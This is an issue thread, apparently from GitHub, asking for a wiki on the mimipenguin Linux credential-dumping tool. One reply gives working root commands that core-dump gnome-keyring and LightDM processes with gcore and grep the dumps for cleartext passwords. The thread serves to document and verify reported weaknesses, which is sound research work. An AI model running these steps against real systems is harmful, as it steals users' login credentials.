Create a wiki

[KINGSABRI]

Feature request

As this script getting more attentions, each plugin has its own way and could need some research, of course. The idea is, we create a wiki for each feature to explain the main issue and how to reproduce it manually. So, people who try to add or use these feature they will have a good understanding to build the same script with another language and add more features for existing scripts.

Expected behavior

To have something like knowledge base that explains each plugin/feature (not code) of mimipenguin

Reproduce Steps

To dump Linux memory for a specific process to disk, we need the following:

Gdm

1. Get process id (PID): /proc/[PID]/cmdline cmdline is file holds the complete command line for the process.
2. Get PID maps: /proc/[PID]/maps maps is file containing the currently mapped memory regions and their access permissions.
3. Get processes memory pages: /proc/[PID]/mem mem is a file can be used to access the pages of a process's memory through

search for ^.+libgck\-1\.so\.0$ in memory dump

[Oxicode]

+1

[bcoles]

I noticed the wiki hasn't been created yet, so here's some notes for gnome-keyring and LightDM.

Note that the steps provided are simply to verify the issue and may differ slightly to the techniques used in mimipenguin.

gnome-keyring

• Original report and PoC by xivoct

Steps to reproduce:

# gcore $(pgrep gnome-keyring)
# strings core.* | grep -E '^.+libgck\-1\.so\.0$' -B 10 -A 10

LightDM

• Original report and PoC by Sven Blumenstein

Steps to reproduce:

# gcore $(ps -eo pid,command | grep lightdm | grep session-child | awk -F ' ' '{ print $1 }')
# strings core.* | grep -E '^_pammodutil_getspnam_' -A1